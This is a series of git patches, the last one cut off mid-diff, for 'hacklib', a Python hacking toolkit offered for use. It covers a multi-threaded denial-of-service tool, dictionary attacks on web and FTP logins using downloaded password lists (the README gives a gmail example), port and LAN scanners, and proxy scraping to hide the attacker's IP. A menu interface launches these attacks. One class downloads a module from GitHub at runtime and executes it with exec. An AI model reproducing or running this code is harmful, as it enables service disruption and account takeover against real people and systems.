From a56873922b401532f5af01c5f71d5fa90b5a00bf Mon Sep 17 00:00:00 2001 From: Leon Li Date: Tue, 21 Jun 2016 17:04:59 -0700 Subject: [PATCH 01/40] Update hacklib.py --- hacklib.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hacklib.py b/hacklib.py index 0bf3834..4047cb4 100644 --- a/hacklib.py +++ b/hacklib.py @@ -296,7 +296,7 @@ def send(IP, port, message, keepalive = False): return response def topPasswords(amount): - '''Get up to 1,000,000 most common passwords. + '''Get up to 100,000 most common passwords. ''' url = 'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10_million_password_list_top_100000.txt' passlist = urllib2.urlopen(url).read().split('\n') From a02147a2f43d5ccc87dfa0088ba54861ea11ecd3 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Wed, 22 Jun 2016 04:39:22 -0700 Subject: [PATCH 02/40] Update hacklib.py --- hacklib.py | 1 - 1 file changed, 1 deletion(-) diff --git a/hacklib.py b/hacklib.py index 4047cb4..46719ba 100644 --- a/hacklib.py +++ b/hacklib.py @@ -123,7 +123,6 @@ def _login_BA(self): response.close() return True except Exception, e: - print str(e) if 'Error 401' in str(e): return False From 5fef62482fabbd862efa49ac252660d87eabc822 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Wed, 22 Jun 2016 10:28:50 -0700 Subject: [PATCH 03/40] Add getProxies() and Proxy class --- hacklib.py | 128 ++++++++++++++++++++++++++++++++++++++++++++++++----- 1 file changed, 116 insertions(+), 12 deletions(-) diff --git a/hacklib.py b/hacklib.py index 46719ba..8872468 100644 --- a/hacklib.py +++ b/hacklib.py @@ -19,9 +19,9 @@ OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.''' import socket, httplib, threading, time, urllib2 -from multiprocessing import Queue +from Queue import Queue -class FTPAuth: +class FTPAuth(object): '''FTP login and command handler. Commands: login() Args: username, password @@ -50,7 +50,7 @@ def login(self, username, password): else: raise Exception(response) -class AuthClient: +class AuthClient(object): '''Universal login tool for most login pages as well as HTTP Basic Authentication. Commands: login() Args: url, username, password @@ -109,7 +109,7 @@ def _login_mechanize(self): if response.geturl() != loginurl: return response.read() else: - return False + raise Exception('Login credentials incorrect.') def _login_BA(self): try: @@ -120,11 +120,12 @@ def _login_BA(self): auth = urllib2.HTTPBasicAuthHandler(passmanager) opener = urllib2.build_opener(auth) response = opener.open(self.url, timeout=8) + data = response.read() response.close() - return True + return data except Exception, e: if 'Error 401' in str(e): - return False + raise Exception('Login credentials incorrect.') def login(self, url, username, password): self.url = url @@ -136,12 +137,11 @@ def login(self, url, username, password): # attempts to login with BA method and return True return self._login_BA() if logintype == 'TO': - print 'Request timed out.' - return False + raise Exception('Request timed out.') if logintype == 'FORM': return self._login_mechanize() -class DOSer: +class DOSer(object): '''Hits a host with GET requests on default port 80 from multiple threads. Commands: launch() Args: host, duration, threads(default 1), port(default 80), @@ -196,7 +196,7 @@ def launch(self, host, duration, threads = 1, port = 80, payload = 'default'): self.q.join() return -class PortScanner: +class PortScanner(object): '''Scan an IP address using scan(host) with default port range 1-1024. Commands: scan() Args: IP, port_range(default 1024), timeout(default 1), verbose(default True) @@ -274,10 +274,114 @@ def scan(self, IP, port_range = (1, 1025), timeout = 1, verbose = True): self.q.put(worker) self.q.join() - + +class Proxy(object): + '''Can work in conjunction with getProxies() to tunnel all + network activity in the Python script through a Socks4/5 proxy. + Commands: + set_auto() Args: getProxies(), timeout=10 + set_manual() Args: IP, port, proxy_type + ''' + + def __init__(self): + self.IP = '' + self.port = '' + self.proxy_type = '' + self.country = '' + self._socksfile = urllib2.urlopen('https://raw.githubusercontent.com/Anorov/PySocks/master/socks.py').read() + global socks + # Dynamically import socks.py from the internet + socks = importFromString(self._socksfile, 'socks') + + def set_auto(self, proxies, timeout=10): + for proxy in proxies: + if proxy[4] == 'Socks4': + self.proxy_type = socks.PROXY_TYPE_SOCKS4 + else: + self.proxy_type = socks.PROXY_TYPE_SOCKS5 + try: + # Sets the socket.socket class to the socks module's socksocket class + socks.setdefaultproxy(self.proxy_type, proxy[0], int(proxy[1])) + socket.socket = socks.socksocket + # Tests to see if the proxy can open a webpage + currentIP = urllib2.urlopen('http://icanhazip.com/', timeout = timeout).read().split()[0] + self.IP = proxy[0] + self.port = int(proxy[1]) + self.country = proxy[2] + return + except: pass + raise Exception('Couldn\'t connect to any proxies.') + + def set_manual(IP, port, proxy_type='Socks5'): + if proxy_type == 'Socks4': + self.proxy_type = socks.PROXY_TYPE_SOCKS4 + else: + self.proxy_type = socks.PROXY_TYPE_SOCKS5 + try: + socks.setdefaultproxy(self.proxy_type, IP, port) + socket.socket = socks.socksocket + currentIP = urllib2.urlopen('http://icanhazip.com/').read().split()[0] + self.IP = IP + self.port = port + return currentIP + except: raise Exception('Connection failed.') + + +def importFromString(code, name): + """Import dynamically generated code as a module. + Args: code: a string, a file handle, or a compiled binary + name: the name of the module + """ + import sys, imp + module = imp.new_module(name) + exec code in module.__dict__ + return module + + def getIP(host): return socket.gethostbyname(host) +def getProxies(country_filter = 'ALL', proxy_type = ('Socks4', 'Socks5')): + '''Gets list of recently tested Socks4/5 proxies. + Return format is as follows: + [IP, Port, Country Code, Country, Proxy Type, Anonymous, Yes/No, Last Checked] + Args: country_filter: Specify country codes within a tuple, e.g. ('US', 'MX') + proxy_type: Specify whic Socks version to use, e.g. 'Socks5' + ''' + try: import mechanize + except: raise Exception('Please install the mechanize module before continuing.') + try: from bs4 import BeautifulSoup + except: raise Exception('Please install the beautifulsoup4 module before continuing.') + br = mechanize.Browser() + br.set_handle_robots(False) + br.addheaders = [('User-agent', 'googlebot')] + data = br.open('http://www.socks-proxy.net').read() + soup = BeautifulSoup(data, 'html.parser') + proxylist = [] + table = soup.find('table') + tbody = table.find('tbody') + rows = tbody.find_all('tr') + for row in rows: + cols = row.find_all('td') + cols = [ele.text.strip() for ele in cols] + proxylist.append([ele for ele in cols if ele]) + filteredlist = [] + if not country_filter == 'ALL': + for proxy in proxylist: + if proxy[2] in country_filter: + filteredlist.append(proxy) + proxylist = filteredlist + filteredlist = [] + if not proxy_type == ('Socks4', 'Socks5'): + for proxy in proxylist: + if not country_filter == 'ALL': + if proxy[4] in proxy_type and proxy[2] in country_filter: + filteredlist.append(proxy) + else: + if proxy[4] in proxy_type: filteredlist.append(proxy) + proxylist = filteredlist + return proxylist + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) def send(IP, port, message, keepalive = False): '''Creates new socket and sends a TCP message. If keepalive is true, use hacklib.sock @@ -295,7 +399,7 @@ def send(IP, port, message, keepalive = False): return response def topPasswords(amount): - '''Get up to 100,000 most common passwords. + '''Get up to 1,000,000 most common passwords. ''' url = 'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10_million_password_list_top_100000.txt' passlist = urllib2.urlopen(url).read().split('\n') From f276db1878a7badf49dc51f0c32671205788150d Mon Sep 17 00:00:00 2001 From: Leon Li Date: Wed, 22 Jun 2016 11:04:59 -0700 Subject: [PATCH 04/40] Update README.md --- README.md | 46 +++++++++++++++++++++++++++++++++++++--------- 1 file changed, 37 insertions(+), 9 deletions(-) diff --git a/README.md b/README.md index bf73913..c04d697 100644 --- a/README.md +++ b/README.md @@ -6,7 +6,7 @@ hacklib is a Python module for hacking enthusiasts interested in network securit #### Examples of Usage - -Multi-threaded Denial of Service (DOS) Stress-Testing: +Multi-threaded Denial of Service (DOS) stress-testing: ```python import hacklib @@ -15,7 +15,7 @@ dos = hacklib.DOSer() dos.launch('127.0.0.1', duration=30, threads=50) ``` - -Universal Login for almost all HTTP/HTTPS form-based logins and HTTP Basic Authentication logins: +Universal login client for almost all HTTP/HTTPS form-based logins and HTTP Basic Authentication logins: ```python import hacklib @@ -25,13 +25,15 @@ ac = hacklib.AuthClient() htmldata = ac.login('https://gmail.com', 'email', 'password') # Returns HTML whether login works or not. -# If resulting URL is the same, assumes failure and returns False. -if htmldata and 'Inbox' in htmldata: - print 'Login Success' +try: + if 'Inbox' in htmldata: print 'Login Success.' + else: print 'Login Failed.' +except: print 'Couldn't even connect. :(' -# For logins using HTTP Basic Auth, just check boolean: -#if htmldata: -# print 'Login Success' +# For logins using HTTP Basic Auth: +try: + htmldata = ac.login('http://somewebsite.com', 'admin', 'password') +except: pass #login failed ``` Simple Dictionary Attack using AuthClient: ```python @@ -90,7 +92,7 @@ Cookie: C107351277=BBBBBBBBBBBBBBBBBBBB\x00''' + '\r\n\r\n' # The router's admin page is now fully accessible from any web browser. ``` - -FTP Authentication: +FTP authentication: ```python import hacklib ftp = hacklib.FTPAuth('127.0.0.1', 21) @@ -99,3 +101,29 @@ try: except: print 'Login failed.' ``` +- +Socks4/5 proxy scraping and tunneling +```python +>>> import hacklib +>>> import urllib2 +# Scrape recently added Socks proxies from the internet +>>> proxylist = hacklib.getProxies() +>>> proxy = hacklib.Proxy() +# Automatically find and connect to a working proxy in proxylist +>>> proxy.connect(proxylist) +>>> proxy.IP +u'41.203.214.58' +>>> proxy.port +65000 +>>> proxy.country +u'KE' +# All Python network activity across all modules are routed through proxy +>>> urllib2.urlopen('http://icanhazip.com/').read() +'41.203.214.58\n' +# Notes: Only network activity via Python masked by the proxy. +# Network activity on other programs remain unmasked. +``` +Filter proxies by +# Filtering proxies by country and type: +# proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5' +``` From 5d9052a2da89c3b68f2e90d604570ca39e00cdc5 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Wed, 22 Jun 2016 11:05:58 -0700 Subject: [PATCH 05/40] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index c04d697..4301b8e 100644 --- a/README.md +++ b/README.md @@ -35,7 +35,7 @@ try: htmldata = ac.login('http://somewebsite.com', 'admin', 'password') except: pass #login failed ``` -Simple Dictionary Attack using AuthClient: +Simple dictionary attack using AuthClient: ```python import hacklib From aacf80a482d4b412a8b422f439b0c8400ed88408 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Wed, 22 Jun 2016 11:08:15 -0700 Subject: [PATCH 06/40] Update README.md --- README.md | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index 4301b8e..76968dd 100644 --- a/README.md +++ b/README.md @@ -117,13 +117,11 @@ u'41.203.214.58' 65000 >>> proxy.country u'KE' -# All Python network activity across all modules are routed through proxy +# All Python network activity across all modules are routed through the proxy >>> urllib2.urlopen('http://icanhazip.com/').read() '41.203.214.58\n' -# Notes: Only network activity via Python masked by the proxy. -# Network activity on other programs remain unmasked. -``` -Filter proxies by +# Notes: Only network activity via Python are masked by the proxy. +# Network activity on other programs such as your webbrowser remain unmasked. # Filtering proxies by country and type: -# proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5' +# proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5') ``` From bcc8fdcc1dcaa90be5031db99b1838095a5ec34d Mon Sep 17 00:00:00 2001 From: Leon Li Date: Wed, 22 Jun 2016 11:10:12 -0700 Subject: [PATCH 07/40] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 76968dd..0348ee2 100644 --- a/README.md +++ b/README.md @@ -122,6 +122,6 @@ u'KE' '41.203.214.58\n' # Notes: Only network activity via Python are masked by the proxy. # Network activity on other programs such as your webbrowser remain unmasked. -# Filtering proxies by country and type: +# To filter proxies by country and type: # proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5') ``` From 71d9f6032cce5348099d620141ba8826dac9fd52 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Wed, 22 Jun 2016 11:15:25 -0700 Subject: [PATCH 08/40] Add getProxies() and Proxy class The Proxy class allows for Socks 4 or 5 proxy tunneling within the Python script, working across all modules. --- hacklib.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/hacklib.py b/hacklib.py index 8872468..af8dbe6 100644 --- a/hacklib.py +++ b/hacklib.py @@ -293,7 +293,7 @@ def __init__(self): # Dynamically import socks.py from the internet socks = importFromString(self._socksfile, 'socks') - def set_auto(self, proxies, timeout=10): + def connect(self, proxies, timeout=10): for proxy in proxies: if proxy[4] == 'Socks4': self.proxy_type = socks.PROXY_TYPE_SOCKS4 @@ -312,7 +312,7 @@ def set_auto(self, proxies, timeout=10): except: pass raise Exception('Couldn\'t connect to any proxies.') - def set_manual(IP, port, proxy_type='Socks5'): + def connect_manual(IP, port, proxy_type='Socks5'): if proxy_type == 'Socks4': self.proxy_type = socks.PROXY_TYPE_SOCKS4 else: From dff847c4af314abbe6d1eabdb3b2003db47cafc6 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Wed, 22 Jun 2016 11:58:37 -0700 Subject: [PATCH 09/40] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0348ee2..0bcca32 100644 --- a/README.md +++ b/README.md @@ -28,7 +28,7 @@ htmldata = ac.login('https://gmail.com', 'email', 'password') try: if 'Inbox' in htmldata: print 'Login Success.' else: print 'Login Failed.' -except: print 'Couldn't even connect. :(' +except: print 'Couldn\'t even connect. :(' # For logins using HTTP Basic Auth: try: From 3b137e77e20d2cac501ad9a048be44dbd12affa1 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Wed, 22 Jun 2016 12:01:54 -0700 Subject: [PATCH 10/40] Add usage example for Proxy() class --- README.md | 18 +++++++----------- 1 file changed, 7 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 0bcca32..9421f80 100644 --- a/README.md +++ b/README.md @@ -24,11 +24,9 @@ ac = hacklib.AuthClient() # Logging into a gmail account htmldata = ac.login('https://gmail.com', 'email', 'password') -# Returns HTML whether login works or not. -try: - if 'Inbox' in htmldata: print 'Login Success.' - else: print 'Login Failed.' -except: print 'Couldn\'t even connect. :(' +# Check for a string in the resulting page +if 'Inbox' in htmldata: print 'Login Success.' +else: print 'Login Failed.' # For logins using HTTP Basic Auth: try: @@ -106,19 +104,17 @@ Socks4/5 proxy scraping and tunneling ```python >>> import hacklib >>> import urllib2 -# Scrape recently added Socks proxies from the internet ->>> proxylist = hacklib.getProxies() +>>> proxylist = hacklib.getProxies() # scrape recently added socks proxies from the internet >>> proxy = hacklib.Proxy() -# Automatically find and connect to a working proxy in proxylist ->>> proxy.connect(proxylist) +>>> proxy.connect(proxylist) # automatically find and connect to a working proxy in proxylist >>> proxy.IP u'41.203.214.58' >>> proxy.port 65000 >>> proxy.country u'KE' -# All Python network activity across all modules are routed through the proxy ->>> urllib2.urlopen('http://icanhazip.com/').read() +# All Python network activity across all modules are routed through the proxy: +>>> urllib2.urlopen('http://icanhazip.com/').read() '41.203.214.58\n' # Notes: Only network activity via Python are masked by the proxy. # Network activity on other programs such as your webbrowser remain unmasked. From ab141caf2ee69db3882bdcdf10a9cc45a59b257c Mon Sep 17 00:00:00 2001 From: Leon Li Date: Sat, 2 Jul 2016 05:11:54 -0700 Subject: [PATCH 11/40] add __init__.py --- __init__.py | 1 + 1 file changed, 1 insertion(+) create mode 100644 __init__.py diff --git a/__init__.py b/__init__.py new file mode 100644 index 0000000..1628afc --- /dev/null +++ b/__init__.py @@ -0,0 +1 @@ +from hacklib import * From d7da777b9a478c7195ff0ce92d0b290bce0a7eec Mon Sep 17 00:00:00 2001 From: Leon Li Date: Sat, 2 Jul 2016 05:16:44 -0700 Subject: [PATCH 12/40] Add installation instructions --- README.md | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 9421f80..60066e8 100644 --- a/README.md +++ b/README.md @@ -4,7 +4,15 @@ ##### Toolkit for hacking enthusiasts using Python. hacklib is a Python module for hacking enthusiasts interested in network security. It is currently in active development. -#### Examples of Usage +- +#### Installation +To get hacklib, simply run in command line: +```console +pip install hacklib +``` + +- +#### Usage Examples - Multi-threaded Denial of Service (DOS) stress-testing: ```python From b91e5d924695588e25d8b152b618ecda6a0c4638 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Sat, 2 Jul 2016 05:17:25 -0700 Subject: [PATCH 13/40] Add installation instructions --- README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/README.md b/README.md index 60066e8..ae72545 100644 --- a/README.md +++ b/README.md @@ -13,7 +13,6 @@ pip install hacklib - #### Usage Examples -- Multi-threaded Denial of Service (DOS) stress-testing: ```python import hacklib From 8c9dccbc53dbe9c27017553424d126ce144765b1 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Thu, 7 Jul 2016 01:47:10 -0700 Subject: [PATCH 14/40] Add proxy handling in UI --- hacklib.py | 45 ++++++++++++++++++++++++++++++++++++++++++--- 1 file changed, 42 insertions(+), 3 deletions(-) diff --git a/hacklib.py b/hacklib.py index af8dbe6..79a446f 100644 --- a/hacklib.py +++ b/hacklib.py @@ -134,7 +134,7 @@ def login(self, url, username, password): # ascertain the type of login page given by url logintype = self. _get_login_type() if logintype == 'BA': - # attempts to login with BA method and return True + # attempts to login with BA method and return html return self._login_BA() if logintype == 'TO': raise Exception('Request timed out.') @@ -279,8 +279,8 @@ class Proxy(object): '''Can work in conjunction with getProxies() to tunnel all network activity in the Python script through a Socks4/5 proxy. Commands: - set_auto() Args: getProxies(), timeout=10 - set_manual() Args: IP, port, proxy_type + connect() Args: getProxies(), timeout=10 + connect_manual() Args: IP, port, proxy_type ''' def __init__(self): @@ -405,3 +405,42 @@ def topPasswords(amount): passlist = urllib2.urlopen(url).read().split('\n') return passlist[:amount] +def userInterface(): + '''Start text-based interface for easier usage if hacklib isn't being used as a library. + ''' + while True: + print 'Enter an IP address or URL for further options.' + print 'Or, enter "proxy" to connect to a proxy.' + cmd = raw_input('> ') + if '.' in cmd: # Checks for . to make sure it's an IP or URL + address = getIP(cmd) + print 'What would you like to do?' + print '1) PortScan' + print '2) DOS' + print '3) Send TCP message' + print '4) Attempt login' + cmd = getIP(raw_input('> ')) + elif 'proxy' in cmd: + print 'Would you like to automatically find a proxy or input one manually?' + print 'Enter the number corresponding to your choice.' + print '1) Auto' + print '2) Manual' + cmd = raw_input('> ') + proxies = getProxies() + global proxy + proxy = Proxy() + if cmd == '1': + proxy.connect(getProxies()) + print 'Your new IP address is ' + proxy.IP + print 'This proxy is located in ' + proxy.country + elif cmd == '2': + pr_address = raw_input('Proxy address > ') + pr_port = raw_input('Proxy port > ') + pr_type = raw_input('Enter "Socks4" or "Socks5" > ') + try: proxy.connect_manual(pr_address, pr_port, pr_type) + except: print 'Connection failed.'; pass + print 'Proxy connected.' + pass + +if __name__ == '__main__': + userInterface() From 3af30dce92d424a2051915ec2e9e3db7e5d85bbd Mon Sep 17 00:00:00 2001 From: Leon Li Date: Fri, 19 Aug 2016 06:03:59 -0700 Subject: [PATCH 15/40] Lan scanning and UI --- hacklib.py | 301 +++++++++++++++++++++++++++++++++++++++++++++++++---- 1 file changed, 282 insertions(+), 19 deletions(-) diff --git a/hacklib.py b/hacklib.py index 79a446f..1dea7c0 100644 --- a/hacklib.py +++ b/hacklib.py @@ -18,7 +18,7 @@ CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.''' -import socket, httplib, threading, time, urllib2 +import socket, httplib, threading, time, urllib2, os from Queue import Queue class FTPAuth(object): @@ -34,7 +34,7 @@ def __init__(self, IP, port=21): self.username = '' self.password = '' self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - self.s.settimeout(8) + self.s.settimeout(3) self.s.connect((self.IP, self.port)) self.s.recv(1024) @@ -47,6 +47,8 @@ def login(self, username, password): response = self.send('PASS ' + password + '\r\n') if '230' in response: return + elif '331' in response: + return 'Password required' else: raise Exception(response) @@ -76,7 +78,7 @@ def _login_mechanize(self): try: import mechanize except: - raise Exception('Please install the mechanize module before continuing.') + raise MissingPackageException('Please install the mechanize module before continuing.') # Sets up common input names/ids and creates instance of mechanize.Browser() userfields = ['user', 'username', 'usr', 'email', 'name', 'login', 'userid', 'userid-input', 'player'] passfields = ['pass', 'password', 'passwd', 'pw', 'pwd'] @@ -236,6 +238,8 @@ def _portscan(self, port): Accept-Encoding: gzip, deflate''' + '\r\n\r\n' s.send(headers) response = s.recv(1024) + response = response.splitlines() + response = '\n'.join(response[:7]) self.openlist.append(port) if self.verbose: with self.print_lock: @@ -275,6 +279,99 @@ def scan(self, IP, port_range = (1, 1025), timeout = 1, verbose = True): self.q.join() +class LanScanner(object): + '''Scans local devices on your LAN network. + Commands: + scan() Args: host_range(default (1, 255)) + ''' + + def __init__(self): + self.host_range = [] + self.alive_hosts = [] + self.localIP = '' + + def _threader(self): + while True: + self.worker = self.q.get() + self._scan(self.worker) + self.q.task_done() + + def _scan(self, host): + import subprocess + try: + resp = subprocess.check_output(['ping', '-c1', '-W90', host]) + self.alive_hosts.append(host) + except: return + + def getLocalIP(self): + import subprocess + proc = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE, shell=True) + (out, err) = proc.communicate() + data = out.splitlines() + for line in data: + if 'inet ' in line and '127.' not in line: + return line.split(' ')[1] + + def scan(self, h_range = (1, 255)): + # Finds local IP first in order to determine IP range of local network + localip = self.getLocalIP() + stub = '.'.join(localip.split('.')[:-1]) + # Adds list of possible local hosts to self.range_range + for i in range(h_range[0], h_range[1]): + self.host_range.append(stub + '.' + str(i)) + self.q = Queue() + # Launches 100 threads to ping 254 potential hosts + for x in range(100): + t = threading.Thread(target=self._threader) + t.daemon = True + t.start() + for worker in self.host_range: + self.q.put(worker) + self.q.join() + return list(set(self.alive_hosts)) + +class _Getch: + """Gets a single character from standard input. Does not echo to the + screen.""" + def __init__(self): + try: + self.impl = _GetchWindows() + except ImportError: + try: + self.impl = _GetchUnix() + except ImportError: + self.impl = _GetchMacCarbon() + + def __call__(self): return self.impl() + + +class _GetchUnix: + def __init__(self): + import tty, sys, termios + + def __call__(self): + import sys, tty, termios + try: + fd = sys.stdin.fileno() + old_settings = termios.tcgetattr(fd) + try: + tty.setraw(sys.stdin.fileno()) + ch = sys.stdin.read(1) + finally: + termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) + return ch + except: return raw_input('> ') + +class _GetchWindows: + def __init__(self): + import msvcrt + + def __call__(self): + try: + import msvcrt + return msvcrt.getch() + except: return raw_input('> ') + class Proxy(object): '''Can work in conjunction with getProxies() to tunnel all network activity in the Python script through a Socks4/5 proxy. @@ -337,7 +434,6 @@ def importFromString(code, name): exec code in module.__dict__ return module - def getIP(host): return socket.gethostbyname(host) @@ -349,9 +445,9 @@ def getProxies(country_filter = 'ALL', proxy_type = ('Socks4', 'Socks5')): proxy_type: Specify whic Socks version to use, e.g. 'Socks5' ''' try: import mechanize - except: raise Exception('Please install the mechanize module before continuing.') + except: raise MissingPackageException('Please install the mechanize module before continuing.') try: from bs4 import BeautifulSoup - except: raise Exception('Please install the beautifulsoup4 module before continuing.') + except: raise MissingPackageException('Please install the beautifulsoup4 module before continuing.') br = mechanize.Browser() br.set_handle_robots(False) br.addheaders = [('User-agent', 'googlebot')] @@ -398,34 +494,195 @@ def send(IP, port, message, keepalive = False): sock.close() return response +def ping(host): + """Pings a host and returns true if the host exists. + """ + import os, platform + ping_str = "-n 1" if platform.system().lower()=="windows" else "-c 1" + return os.system("ping " + ping_str + " " + host) == 0 + def topPasswords(amount): - '''Get up to 1,000,000 most common passwords. + '''Get up to 100,000 most common passwords. ''' url = 'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10_million_password_list_top_100000.txt' passlist = urllib2.urlopen(url).read().split('\n') return passlist[:amount] +def uiPortScan(address): + print '' + print '1) default scan (port range 1-1024)' + print '2) custom range' + ink = _Getch() + cmd = ink() + ps = PortScanner() + print 'Beginning port scan.' + if cmd == '1': + ps.scan(address) + if cmd == '2': + s_port = raw_input('Input starting port > ') + e_port = raw_input('Input end port >') + ps.scan(address, (s_port, e_port)) + print 'Port scan complete.' + +def uiDOS(address): + dos = DOSer() + print '' + duration = raw_input('Duration > ') + threads = raw_input('Threads > ') + port = int(raw_input('Port > ')) + payload = raw_input('Payload > ') + print 'Launching DOS attack' + dos.launch(address, duration, threads, port, payload) + +def uiTCPMessage(address): + print '' + port = int(raw_input('Input port >')) + message = raw_input('Message > ') + send(address, port, message) + +def uiLogin(address): + print '' + print 'Select login type' + print '1) HTTP/Form login' + print '2) FTP login' + print '3) Exit' + print '' + ink = _Getch() + cmd = ink() + if cmd == '1': + ac = AuthClient() + print '1) Dictionary attack' + print '2) Exit' + ink = _Getch() + cmd = ink() + if cmd == '1': + username = raw_input('Username > ') + print '1) Try most common passwords' + print '2) Import password list (separated by newline)' + cmd = ink() + if cmd == '1': + print 'Try the top out of 100,000 most common passwords:' + num = int(raw_input('> ')) + passwords = topPasswords(num) + if cmd == '2': + passfile = raw_input('Filepath > ') + with open(passfile, 'r') as f: + passwords = passfile.read().splitlines() + print 'Input a unique string the webpage may respond with if login fails' + print 'i.e. "please try again" or "login failed"' + failstring = raw_input('> ') + for password in passwords: + try: + data = ac.login(address, username, password) + if failstring in data: + print password + ' failed' + elif failstring not in data: + print 'Login success!' + print 'Password is: ' + password + time.sleep(2) + return + except: + print password + ' failed' + if cmd == '2': + return + + if cmd == '2': + ftp = FTPAuth(address) + print '1) Dictionary attack' + print '2) Single login' + print '3) Exit' + ink = _Getch() + cmd = ink() + username = raw_input('Username > ') + if cmd == '1': + print 'Try the top out of 100,000 most common passwords:' + num = raw_input('> ') + for password in topPasswords(num): + try: + response = ftp.send('USER ' + username + '\r\n') + if '331' in response: + response = ftp.send('PASS ' + password + '\r\n') + if '331' in response: + response = ftp.send('PASS ' + password + '\r\n') + if '230' in response: + print 'Login success!' + print 'Password is: ' + password + time.sleep(2) + return + if '530' in response: + print password + ' failed.' + ftp = FTPAuth(address) + except: + print password + ' failed.' + ftp = FTPAuth(address) + + if cmd == '2': + username = raw_input('Username > ') + ftp.send('USER ' + username + '\r\n') + password = raw_input('Password > ') + ftp.send('PASS ' + password + '\r\n') + if cmd == '3': + return + +def uiLanScan(): + lan = LanScanner() + print 'Starting Lan scan' + hosts = lan.scan() + for ip in hosts: + print ip + print 'Lan scan complete.' + time.sleep(2) + def userInterface(): - '''Start text-based interface for easier usage if hacklib isn't being used as a library. + '''Start UI if hacklib isn't being used as a library. ''' + firstrun = 0 while True: - print 'Enter an IP address or URL for further options.' - print 'Or, enter "proxy" to connect to a proxy.' - cmd = raw_input('> ') - if '.' in cmd: # Checks for . to make sure it's an IP or URL - address = getIP(cmd) + if firstrun == 0: + print '----------------------------------------------' + print 'Hey. What can I do you for?' + print '\n' + firstrun += 1 + print 'Enter the number corresponding to your choice.' + print '' + print '1) Connect to a proxy' + print '2) Target an IP or URL' + print '3) Lan Scan' + print '4) Exit' + ink = _Getch() + cmd = ink() + if cmd == '4': + return + if cmd == '2': + address = raw_input('Input IP or URL > ') + if '.' not in address: + print 'Invalid IP/URL.' + return print 'What would you like to do?' - print '1) PortScan' + print '' + print '1) Port scan' print '2) DOS' print '3) Send TCP message' print '4) Attempt login' - cmd = getIP(raw_input('> ')) - elif 'proxy' in cmd: + print '5) Exit' + cmd = ink() + if cmd == '1': uiPortScan(getIP(address)) + if cmd == '2': uiDOS(getIP(address)) + if cmd == '3': uiTCPMessage(getIP(address)) + if cmd == '4': uiLogin(address) + cmd = '' + + if cmd == '3': + uiLanScan() + + if cmd == '1': print 'Would you like to automatically find a proxy or input one manually?' print 'Enter the number corresponding to your choice.' + print '' print '1) Auto' print '2) Manual' - cmd = raw_input('> ') + cmd = ink() + print 'Connecting to a SOCKS proxy.' proxies = getProxies() global proxy proxy = Proxy() @@ -433,14 +690,20 @@ def userInterface(): proxy.connect(getProxies()) print 'Your new IP address is ' + proxy.IP print 'This proxy is located in ' + proxy.country - elif cmd == '2': + print '---------' + time.sleep(2) + if cmd == '2': pr_address = raw_input('Proxy address > ') pr_port = raw_input('Proxy port > ') pr_type = raw_input('Enter "Socks4" or "Socks5" > ') try: proxy.connect_manual(pr_address, pr_port, pr_type) - except: print 'Connection failed.'; pass + except: print 'Connection failed.'; time.sleep(2); pass print 'Proxy connected.' + time.sleep(2) pass if __name__ == '__main__': userInterface() + +class MissingPackageException(Exception): + '''Raise when 3rd party modules are not able to be imported.''' From 230d4fb0cdc5641a18ca1b4af99f8afcb9092811 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Fri, 19 Aug 2016 06:22:33 -0700 Subject: [PATCH 16/40] ui --- README.md | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) diff --git a/README.md b/README.md index ae72545..b238d5d 100644 --- a/README.md +++ b/README.md @@ -10,7 +10,29 @@ To get hacklib, simply run in command line: ```console pip install hacklib ``` +hacklib also has a user interface. To use it, you can do one of the following: +Download hacklib.py and run in console: +```console +python hacklib.py +---------------------------------------------- +Hey. What can I do you for? + + +Enter the number corresponding to your choice. + +1) Connect to a proxy +2) Target an IP or URL +3) Lan Scan +4) Exit + +``` +Or if you got it using pip: + +```python +import hacklib +hacklib.userInterface() +``` - #### Usage Examples Multi-threaded Denial of Service (DOS) stress-testing: From bdd29fcb4e0855f783c3707dcfb89652a1edbd08 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Fri, 26 Aug 2016 21:16:08 -0700 Subject: [PATCH 17/40] dependencies installer --- hacklib.py | 19 +++++++++++++++++-- 1 file changed, 17 insertions(+), 2 deletions(-) diff --git a/hacklib.py b/hacklib.py index 1dea7c0..e14ac50 100644 --- a/hacklib.py +++ b/hacklib.py @@ -445,9 